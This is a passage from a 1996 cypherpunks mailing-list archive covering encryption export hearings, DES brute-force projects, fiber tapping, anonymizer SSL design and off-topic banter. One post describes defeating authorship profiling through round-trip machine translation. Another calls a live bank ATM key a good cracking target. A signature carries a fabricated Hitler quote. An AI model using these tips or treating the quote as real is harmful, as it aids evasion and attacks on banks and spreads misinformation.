_Applied Cryptography_ source and couldn't remember what it was called.
"Um, I can't export, um, this, um," he mumbled. "Cassette," he decided it
was. (Even his committee staffers smirked at that.)

The FBI's Louis Freeh kept mouthing the same tired old line: "No reasonable
person can envision a lawless information superhighway. It was never meant
to be that. We need cops there, as we need them elsewhere. The problem is
the proliferation of unbreakable encryption." He said it's "not too late"
to stop the spread.

After the first panel ended, a gaggle of a half-dozen camera crews waylaid
Freeh in the hallway outside. The FBI director fled down the stairs. The
crews split into teams. Half took the elevator and half pursued on foot.
Downstairs, Freeh shot through the security checkpoint into the safety of a
waiting Chevy Suburban.

Why were they dogging the guy? They didn't care about crypto -- they wanted
a comment about the TWA flight, and Freeh wasn't talking. He didnt' mention
it at all during the hearing...

-Declan

--------------------

Fireworks Expected at Encryption Hearing
July 25, 1996

         WASHINGTON (Reuter) - After sailing through two quiet
subcommittee hearings, a bill to relax restrictions on computer
encoding faces a much choppier ride before the full Senate
Commerce Committee on Thursday.
         The committee will hear from some of the Clinton
administration's big guns on crime and national security,
including FBI Director Louis Freeh and William Crowell, deputy
director of the National Security Agency.
         Software manufacturers and some in Congress argued at
earlier hearings that current export restrictions on encryption
programs -- which code and decode information -- cost American
companies billions in lost sales overseas.

[...]

         Senate bill 1726, the Promotion of Commerce Online in the
Digital Era Act of 1996, would abolish most export restrictions
and prohibit mandatory key escrow. Vice President Al Gore told
reporters at a press conference July 12 that the proposal, known
as the ``pro-code'' bill, is ``unacceptable.''

[...]

         Clinton administration officials have said they favor
less radical reform. Officials are expected to reject the
conclusions of a study released in May by the National Research
Council. The council concluded that encryption export
restrictions should be relaxed and rejected key escrow as
unworkable.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@ayla.avnet.co.uk
Date: Fri, 26 Jul 1996 08:32:13 +0800
To: cypherpunks@toad.com
Subject: Welcome to tmdgmet
Message-ID: <199607252025.VAA03960@ayla.avnet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


--

Hello and welcome to the Tom Dawes-Gamble Met pages mailing list
================================================================

You are very welcome to use the pages and send me Email with requests
for enhancements and new ideas.   I will NOT  reply to any EMAIL that
asks for lost passwords lost user is or for users to be deleted.
you can do all of that from your own browser.


I hope that through this mailing list I can reduce the work I have to 
do to help people.  It is not currently a moderated list but only because
I have not got the time to set up moderation.  

The main purpose of the mailing list is so that I can relay information to
you about the changes and plans for the pages.  

Please don't unsubscribe from the mailing list unless you are changing your
account or service provider.  If your address is not in the mailing list
then your user id will be taken out of the register and you will not be able
to access the pages.

You must have registered correctly to get this message.
Correct registration meerly means that you choose a user name that no one 
else has and that you were able to key the same password twice.

I have three major problem areas.

1)  Compuserve users.  For some reason they seem to have more problems than 
anyone else.  Please read the User Guide for more information about this.

2)  Forgotten user-ids and passwords.  If you have problems in this area
then again the user guide is the place to look.

3)  Can you get weather for or there is no weather for XXXXXX.
    There can be several reasons for this.  
    If you find that other stations have more recent weather then may be 
    the station you are looking for has a problem.  
    If you never see weather for the station then most likely we don't get 
    weather for that station. 
    If nowhere has up to date weather then may be there is a problem
    with the feed you can be sure that AVnet and/or Skytrak already know 
    about the problem.  


I put most of the documentation in the web pages. So I beg you to look there
first.  If you really are stuck then by all means send me email.  I but the 
thing to remember is that 2500 people have registered and most of them don't
have problems.  I will update the pages when there are significant changes.
So if you have not read the User Guide for a while it may be worth a visit.

I am currently restructuring the layout of the weather pages layout so
you should go to the weather home page if you get an error trying to load
a page.

Please remember that I do the work for this page in my on time.
I do not get paid for the work other than the by the "Thank You" Email
and the Article that appeared in Flyer. 

The mailing list addresses are as follows.

1.	tmdgmet@avnet.co.uk 
		
2.	tmdgmet-request@avnet.co.uk

All mail addressed to tmdgmet@avnet.co.uk will be sent to all the 
"subscribers".  You are now subscribed to the list. 

Mail addressed to tmdgmet-request@avnet.co.uk is specifically 
intended to allow you to command the mail system to do something.  
Here's how:

1.	Address a message to tmdgmet-request@avnet.co.uk

2.	Ignore the subject line in your mail program

3.	in the body of the message enter either:
	
	subscribe tmdgmet	(to subscribe to the tmdgmet)
	unsubscribe tmdgmet	(to stop receiving the tmdgmet)
	help tmdgmet		(to get a fuller explanation
				of these and other commands)

To post new messages to everyone on the list, just send them to :-

	tmdgmet@avnet.co.uk

Best regards,
Tom.

--
Tom Dawes-Gamble		Email:	tmdg@avnet.co.uk
G-ATAG  is a Jodel DR1050  /Bent Wings are Best */




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 26 Jul 1996 14:21:49 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.SUN.3.91.960725172813.27251B-100000@crl9.crl.com>
Message-ID: <9607260125.AA08079@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Phill adroitly responded:
> 
>> The moral point is not that there is risk of being caught, it
>> is that society has made laws and unless there are exceptional
>> circumstances it is a duty to obey those laws.

>[Nice try, Phill.]  The moral cowardice to which I was referring 
>had nothing to do with obeying or disobeying a silly law.  It had 
>to do with Phill's citing of same as a craven excuse to neither 
>admit he was wrong nor to risk anything on the validity of his 
>pronouncement.

Actually the original reply I made was simply one of a number of 
objections to what is a very silly argument. I could have equally
answered that way had you actually proposed a duel or that we
"step outside". It is a very silly mode of argument and desrves
to be answered in the same manner (if at all).

The essential humourless of your reply is indicated by your
failure to realise that my conversion of your 25L into 2 cents
was satirical.


>Phill invokes the classic straw man arguement.  What the bet does 
>do is to test the courage of one's convictions.  I think it is 
>obvious to all where Phill fits into this equation.  

And precisely what does that demonstrate? We are debating the issue
of whether Rush's retreat from TV is a result of failure, or more
specifically whether we should believe Rush's spin on the matter.
The truth or falsehood of that argument is indifferent to the depth
of my belief that Rush is a big fat idiot or not. 


One of my friends left CERN to join Netscape a few years back. He
now worth probably $10 million plus as a result. I don't think that
his intelligence relative to Rush was in any way dependent on that
decision. He would still be way smarter than Rush either way and 
Marvin Minsky would be smarter than both. Only guy I have ever met
who was super rich who impressed me as an intellectual force was 
Bill Gates - apart that is from friends who inherited silly amounts
of money. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 26 Jul 1996 13:49:23 +0800
To: alano@teleport.com>
Subject: Re: When books are outlawed
In-Reply-To: <2.2.32.19960725031831.00da51a4@mail.teleport.com>
Message-ID: <Aly1wSa00YUw0buqA0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 24-Jul-96 Re: When books are
outlawed by Alan Olsen@teleport.com 
> Off Our Backs is a PC lesbian magazine.  "On Our Backs" is an S&M Lesbian
> magazine edited by Suzie Bright.  It is not anything resembling PC.  (Ms.
> Bright does not have a nice oppinion of Dwarkin and her fellow travelers, to
> put it mildly.)

Susie Bright is wonderful. She sent a copy of her latest book, which I
have right here: "Nothing but the Girl: The Blatant Lesbian Image."

It's the one I gave Bruce Taylor when he stopped by a few weeks ago.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 26 Jul 1996 14:10:15 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: [Rant]Re: Shell buys key escrow system from TIS
In-Reply-To: <199607251021.GAA33226@osceola.gate.net>
Message-ID: <sly1yLW00YUw0buvQ0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 25-Jul-96 [Rant]Re: Shell buys key
es.. by Jim Ray@gate.net 
> Hmmm.  A new meme, "key recovery" is lots better than "key escrow," but
> I still wonder if I'm ever gonna see a journalist say, "'GAK,' or Govt.
> Access to Keys for cryptography."

I seem to remember I quoted you saying just that. :)

I would have asked the estimable Freeh a GAKky question, but he flew out
the door after this panel ended today...

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 26 Jul 1996 13:56:12 +0800
To: cypherpunks@toad.com
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607251827.AA07862@Etna.ai.mit.edu>
Message-ID: <qogNRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@Etna.ai.mit.edu writes:
> >That's L25, not 25L.  I though Phil was a UK "subject," thus
> >I proposed a wager of 25 Pounds Sterling.  Clear enough?
>
> The generaly accepted abreviation is GBP.

This is an ISO currency code (also a SWIFT code). SWIFT codes generally
coincide with ISO codes, but they have a few extra codes for precious
metals (XAU=gold, XAG=silver) which I think aren't in the ISO document.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Jul 1996 15:18:22 +0800
To: cypherpunks@toad.com
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <Pine.SUN.3.91.960725180951.8320A-100000@crl7.crl.com>
Message-ID: <199607260456.VAA01884@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Thu, 25 Jul 1996, Jerome Tan wrote:
> 
> > Does anyone know how to produce a 7 hertz frequency?
> 
> No, but hum a few bars and we'll fake it.

I'm not sure what this gentleman's application is.  If I wanted
a 7 hz signal, I would take my handy dandy programmable digital
signal generator, press the "sin" button, and punch in "7" on 
the numeric keypad.

Am I missing something here?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 26 Jul 1996 15:41:31 +0800
To: Jerome Tan <cypherpunks@toad.com>
Subject: Re: Produce 7 Hertz Frequency
Message-ID: <2.2.32.19960726050051.00dc1a50@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 PM 7/25/96 +0800, Jerome Tan wrote:
>Does anyone know how to produce a 7 hertz frequency?

Find an establishment that deals in peircing equiptment.  Ask him to give
you a "Prince Albert".  This will give you the tone you seek.  (You will
also never lose your carkeys again.)  You may need a tesla coil for repeated
tones.

Enjoy!



---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris.liljenstolpe@SSDS.com (Christopher Liljenstolpe)
Date: Fri, 26 Jul 1996 12:04:50 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Bare fibers
In-Reply-To: <Pine.BSF.3.91.960723170725.23791A-100000@mcfeely.bsfs.org>
Message-ID: <31f7ee7d.29626488@denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

	There are other ways of detecting the application of the tap,
but at this time, the chance of detecting the existance of the tap is
reallistically pretty slim. 

	If the fiber is enclosed in a pressurised conduit, then a drop
in the conduit pressure indicates that someone MAY be trying to gain
access to the fiber.  While a pressurized glove-box around the conduit
may allow a break in the conduit to be made without detection, varying
the pressure in the conduit makes that a lot more difficult.  It all
depends on what the value is of the data you are trying to
protect/access.

	-=Chris

On Thu, 25 Jul 1996 11:52:12 -0700, the sage abostick@netcom.com (Alan
Bostick) scribed:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <Pine.BSF.3.91.960723170725.23791A-100000@mcfeely.bsfs.org>,
>Rabid Wombat <wombat@mcfeely.bsfs.org> wrote:
>
>> ob crypto/privacy: Anybody have a good idea for detecting a tap on 
>> exterior fiber? I'd expect an attacker to have to interupt connectivity, 
>> terminate both ends of a break, and insert an active device. Thoughts?
>
>As has been mentioned earlier, all an attacker has to do is encourage
>some of the light to exit the fiber, by bending it, contacting it with
>a detector, etc.
>
>If the detector is sensitive enough, the loss induced by this is minimal.
>
>This sort of tapping is exactly the sort of thing quantum cryptography
>is supposed to prevent, or at least identify.  Nothing short of quantum
>methods is going to spot the tap, unless you happen to come across the 
>tap by inspecting the entire length of the fiber.
>
>- -- 
>Alan Bostick               | [Spielberg's] latest is TWISTER, a film that
>mailto:abostick@netcom.com | gives whole new meaning to the phrase "giant
>news:alt.grelb             | sucking sound."  -- Patrick Taggart
>http://www.alumni.caltech.edu/~abostick
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQB1AwUBMffDPeVevBgtmhnpAQHftwL9HTNe4VUHlpRkOAYW1nKFwyw3cqkM+xXt
>+zXOHuR52ffP1M2IZwTnPpBrBaXlCa6W+3uahnczVdJmAR/0MF5ksnh6bpjd+9IP
>KmqnBG52X8f+HazUEygNJkRD1oVGlMTH
>=FHZ5
>-----END PGP SIGNATURE-----
>


--
   ( (   | (               Chris Liljenstolpe <Chris.Liljenstolpe@ssds.com>
    ) ) (|  ), inc.        SSDS, Inc; 8400 Normandale Lake Blvd.; Suite 993
   business driven         Bloomington, MN   55437; 
 technology solutions      TEL 612.921.2392  FAX 612.921.2395   Fram Fram Free!
 PGP Key 1024/E8546BD5     FE 43 BD A6 3C 13 6C DB  89 B3 E4 A1 BF 6D 2A A9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Fri, 26 Jul 1996 15:46:23 +0800
To: cypherpunks@toad.com
Subject: Defeating "Perp Profile" Analyses Of Written Materials
In-Reply-To: <01I7GBFL287694F9CD@delphi.com>
Message-ID: <199607260508.WAA08515@dfw-ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jul 1996, JMKELSEY@delphi.com wrote:
>I wouldn't count on even heavily-chained anonymous remailer messages
>to protect my identity from moderately wealthy and determined
>attackers, if I did many anonymous posts.  Writing style and topic
>alone may narrow the suspect list down to a manageable number.

There is an easy way to defeat psycholinguistic analysis techniques used by 
LEA's to profile perps.  Buy a translation program, (such as Globalink's Spanish 
Assistant) use the program to translate the text to Spanish, (or any other 
language) and then use the program to translate the foreign language text back 
to English.  The baselines of word choice, grammatical structure, etc. will be 
shifted to reflect the biases of the program rather than the biases of the 
writer.  As an example, I will use the entire text of this message as a 
demonstration.

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB


[Begin Spanish Translation]

En Casa, 24 Jul 1996, JMKELSEY@ [delphi.com] escribió:
 "no hago cuento con mensajes del [remailer] iguales muy-encadenado anónimos 
proteger mi identidad de asaltadores algo adinerados y determinados, si hacía 
muchos postes anónimos.  Estilo de la escritura y tema solo estrecharía la lista 
del sospechoso a un número manejable."

Hay una manera fácil derrotar técnicas del análisis del [psycholinguistic] usó 
por LEA perfilar [perps].  Compra una traducción programa, (tal como el Spanish 
Assistant de Globalink) usa el programa traducir el texto a español, (o 
cualquier otro idioma) y entonces usa el programa traducir el texto del idioma 
extranjero retrocede a inglés.  El [baselines] de opción de la palabra, 
estructura gramática, etc. se cambie reflejar los sesgos del programa en lugar 
de los sesgos del escritor.  Como un ejemplo, usaré el texto entero de este 
mensaje como una demostración.

Jonathan Wienke

¡" 1935 bajará en historia! ¡Por la primera vez una nación civilizada tiene 
registro del arma lleno! Nuestras calles serán más seguras, nuestro policía más 
eficaz, y el mundo seguirá nuestra primacía en el futuro!"
--Adolf Hitler

" 46.  El EE.UU. gobierno declara una prohibición en la posesión, venta, 
transportación, y transfiere de todo arma de fuego no-deportivos. .Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--Las 29 Palmas Combaten [http] del Estudio de los Brazos:// www.ksfo560.com/ 
Personalidades/ Palms.htm

¿1935 Alemania= 1996 EE.UU.?

Huella digital importante= 30 F9 85 7F D2 75 4B C6 AC 79 87 3D 99 21 50 CB


[Begin English Translation of Spanish Text]

At home, 24 Jul 1996, JMKELSEY@[ [delphi.com]] he/she/it/you wrote:
 "I don't make have messages of the[ [remailer]] equal very-chained anonymous 
letter protect my identity of attackers something wealthy persons and certain, 
if I/he/she/it/you did many anonymous posts.  Style of the writing and alone 
topic would take in the list of the suspect to a governable number."

There is an easy way defeat technical of the analysis of the[ 
[psycholinguistic]] he/she/it/you used for I/he/she/it/you READ profile[ 
[perps]].  You/he/she/it buy a translation you/he/she/it program, (as the 
Spanish Assistant of Globalink) you/he/she/it use the program translate the text 
to Spanish, (or any another language) and you/he/she/it then use the program 
translate the text of the foreign language you/he/she/it go back to English.  
The[ [baselines]] of option of the word, grammatical structure, etc. 
I/he/she/it/you am changed to reflect the biases of the program instead of the 
biases of the writer.  Like an example, I will use the text I find out this 
message like a demonstration.

Jonathan Wienke

" 1935 will lower in history! For the first time a civilized nation has 
registration of the full weapon! Our streets will be surer, our more effective 
police, and the world will continue our primacy in the future!"
--Adolf Hitler

" 46.  The USA gobierno declara una prohibición en la posesión, venta, 
transportación, y transfiere de todo arma de fuego no-deportivos. .Consider [the 
following statement]: I [would fire] U.S [upon]. [citizens who refuse or resist 
confiscation of firearms banned by] U.S [the]. [government]."
--The 29 Palms Combat[ [http]] of the Study of the Arms:// www.ksfo560.com/ 
Personalities/ Palms.htm

1935 Germany= 1996 USA?

Important fingerprint= 30 F9 85 7F D2 75 4B C6 AC 79 87 3D 99 21 50 CB

[Begin Follow-Up Comments]

Obviously, the technique is crude, (translation software on autopilot works in 
mysterious ways) but it ought to be used by anyone wishing to anonymously 
communicate.  To really work properly, the original message should be worded so 
that the translator program understands all of the words in the message (none of 
the words are bracketed and left untranslated).  Otherwise, an analysis of 
untranslated words can be made.  The subject matter, etc. can still be studied, 
but at least most conventional profiling techniques are rendered orders of 
magnitude more difficult by this process.  Perhaps this could be a value-added 
fee-for-service option for remailer operators? (Using ecash for payment, of 
course.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 26 Jul 1996 14:43:44 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: CD Prices and Inflation
In-Reply-To: <199607260014.RAA00302@mail.pacifier.com>
Message-ID: <199607260310.WAA13233@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


buy classical CDs, they are dirt cheap and fun to listen to.

if you do not like classics, it most likely means that you
just have not found your favorite composer yet.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 26 Jul 1996 07:42:03 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607251646.AA07787@Etna.ai.mit.edu>
Message-ID: <31F7D507.41C67EA6@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@Etna.ai.mit.edu wrote:
> 
> I'm still rather amused by the terms of your bet, $50 vs 25L.
> At current exchange rates 25 Lire is more like 2 cents.
> 
> I thought I had already given my 2 cents.
> 
> Given that this is a public newsgroup, and the one most
> likely to be read by spooks and the FBI I would have to be
> almost as stupid as Rush to accept any bets on it. Its called
> illegal interstate gambling.

Perhaps you should consider joining the FBI?  I think we would
both agree that the net social benefits of this would be positive,
but perhaps for different reasons. :-)

BTW - 'L' is a common abbreviation for 'pounds'.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Fri, 26 Jul 1996 14:03:28 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <Pine.SUN.3.91.960725180951.8320A-100000@crl7.crl.com>
Message-ID: <Pine.OSF.3.91.960725224158.26304A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


Humm......

I guess he wants to do some strange things with his body functions.

Dan


On Thu, 25 Jul 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Thu, 25 Jul 1996, Jerome Tan wrote:
> 
> > Does anyone know how to produce a 7 hertz frequency?
> 
> No, but hum a few bars and we'll fake it.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jul 1996 19:48:19 +0800
To: bryce@digicash.com
Subject: [NOISE IS NOISE] Re: Rand and smoking Re: Flaws of Thinkers (Jefferson, Rand, Nietzsche, Voltaire, etc.) [NOISE E. D.]
Message-ID: <199607260548.WAA19993@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Uh.. yabbut we were talking about insisting that her followers 
>smoke, which is different from saying that smoking is cool.  
>Well, for most people it is different.

You fail to understand the precisely reasoned Aristotelian syllogistic
logic of Ms. Rand's position (you heretic!):

        1) Smoking is a result of fire.
        2) Fire is cool.
        3) Therefore, smoking is cool.
                Q.E.D.

        4) Logic is cool, and non-logic is non-cool
        5) We're cool
        6) Therefore, light up that cigarette or be excommunicated!
                Q.E.D.

>P.S.  I wonder how often the regularly scheduled programming of
>citizen units _is_ exactly?

If you don't see the fnords, they won't eat you.


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jul 1996 18:30:52 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Distributed DES crack
Message-ID: <v02120d07ae1e06c35e95@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 7/23/96, Matt Blaze wrote:

>My estimate is that an FPGA-based machine that can do a single DES key
>every four months (eight months to exhaust the whole keyspace) could
>be built with off-the-shelf stuff for comfortably under $50k (plus
>labor, plus software development costs).  A prototype board should cost
>under $1000 and will help prove the concept and get a more accurate cost
>estimate.  I expect to build such a prototype machine myself, and, if it
>works as I expect, maybe the whole thing.

I am willing to financially contribute to the project.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jul 1996 20:13:20 +0800
To: cypherpunks@toad.com
Subject: Re: DES brute force? (was: Re: Borders *are* transparent)
Message-ID: <v02120d08ae1e08e4deb7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:10 7/23/96, Mixmaster wrote:

>The problem with banking applications is that cracking a real key
>causes lots of real damage.  I don't think it is illegal (as long
>as you don't withdraw somebody else's money), but publishing e.g.
>one of the DES keys used for the "EC Card" PIN verification would
>bring the European ATM system close to collapse.  Finding a self-
>generated key, on the other hand, is not very impressive.

Keys can be changed. Sounds like a good target to me.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 26 Jul 1996 17:02:58 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <01BB7ABB.F7A9E440@Jerome Tan>
Message-ID: <Pine.3.89.9607252338.A23371-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 25 Jul 1996, Jerome Tan wrote:

> Does anyone know how to produce a 7 hertz frequency?
> 
> 

Well, you can pick up most any project book that deals with 555 IC timers 
and there is some kind of circuit there dealing with frequency counting 
or generating. The question really is how strong a signal do you want ?

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 26 Jul 1996 20:05:07 +0800
To: "cypherpunks" <hallam@Etna.ai.mit.edu>
Subject: Re: LIMBAUGH ON TV
Message-ID: <199607260626.XAA20871@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Jul 96 13:35:44 -0800, hallam@Etna.ai.mit.edu wrote:

>I'm still rather amused by the terms of your bet, $50 vs 25L.
>At current exchange rates 25 Lire is more like 2 cents.
>
>I thought I had already given my 2 cents.

I think he meant 25 british Pounds and used L since the pound sign isn't
kosher on many systems.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 26 Jul 1996 18:49:34 +0800
To: eli+@gs160.sp.cs.cmu.edu
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607260111.SAA11897@toad.com>
Message-ID: <199607260435.XAA00384@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


eli+@gs160.sp.cs.cmu.edu wrote:
> 
> Hal Finney writes:
> >I think the best way to approach this problem is to first try to solve
> >it assuming there are only two robbers rather than 20.
> 
> Right.  Of course, you're implicitly assuming not only that this bunch
> of bank robbers is rational, but that they're familiar with
> mathematical induction.  :->

In my initial post that caused all the turmoil I said (literally) this:

``Twenty cypherpunks robbed a bank.''
        ^^^^^^^^^^^^^

I was careful choosing words.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jul 1996 18:32:27 +0800
To: cypherpunks@toad.com
Subject: Re: www.anonymizer.com
Message-ID: <199607260639.XAA21189@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 PM 7/25/96 -0700, mpd@netcom.com (Mike Duvos) wrote:
>I had occasion to try www.anonymizer.com recently, and noticed
>that it does not make SSL connections to other Web servers, nor
>does it seem to accept them from the user.
>
>Is there some technical reason for this?  If I wish to grep the
>Web without my browsing habits becoming known to someone
>monitoring my Net connection, https://www.anonymizer.com with 128
>bit encryption would probably be a good thing to connect to.

I suspect the primary reason is "that takes work we haven't done yet"
rather than anything more cryptographic :-)  However, there are
a couple of theoretical problems with doing it as well.

0A) Suppose You and Webserver are secure by definition (because
        otherwise you're hosed anyway....)
0B) Let -s- denote an SSL connection and --- denote a non-SSL connection.
0C) A connection from You-s-Webserver is as secure as SSL.

1)  A connection from You-s-Anonymizer-s-Webserver is less secure,
        because any flaw or breakin or dishonesty or compromise
        of the Anonymizer compromises the security of your connection.
1A) You may get ripped off or arrested if the Anonymizer's compromised
1B) The Anonymizer may be liable if you get ripped off through it.

2)  An SSL connection may carry a certain amount of indentification
        data across it (I'm speculating a bit), which isn't
        really what you want in an Anonymizer.

3)  A connection You-s-Anonymizer-s-Webserver may not always work
        the same as You-s-Webserver, because the latter may make
        assumptions about the connection that don't hold with the former.
3A) Of course, that's also true with non-SSL connections*,
        but there's less likely to be money riding on the deal.
3B) In particular, there may be different identification data
        passing across the Anonymized connection than the non-Anonymized.
3C) You may trust the Anonymizer and not the Webserver, or vice versa,
        and SSL probably isn't designed to do both correctly.
3D) The Webserver may trust the Anonymizer and not You, or vice versa,
        and SSL probably isn't designed to handle those correctly either.

4)  The Anonymizer may have different encryption types/strengths
        than You or the Webserver.  
4A) If You only do 40-bit RC4 and the Anonymizer can do 3DES,
        the Webserver may think it's got a secure connection
        when your end is weak - especially a problem if the Anonymizer
        is a popular wiretap target.  This can be remedied by
        having the Anonymizer only make https: connections to
        Webservers at the same strength as its connection to You,
        which either requires annoyingly complex programming (bad)
        or a cheap hack like running several Anonymizer servers,
        one with wimpy encryption and one with strong encryption.
4B) If You have a strong crypto connection to the Anonymizer and
        the Webserver only has wimpy RC4/40, there isn't any good
        way for the Anonymizer to tell you about it - so your
        browser may be happily telling you it's got a two-toothed
        3DES/RSA-2048 connection while it's really just RC4/40/RSA-512.
4B1)And that happy Java+JavaScript application your browser is 
        running can check that it's got the MachoCrypto flag set
        and send your credit card number and Secret Plans to the
        Secret Plan Evaluation Service Website, which is a Bad Move...
4B2)Maybe you could program the Anonymizer to check out https:URLs 
        to see what kind of crypto they support, and return 
        anonymizered URLs that use the different-strength Anonymizers
        referred to in 4A.  Not sure this would always work.

5)  The extra RSA encryption from using SSL would probably cause a
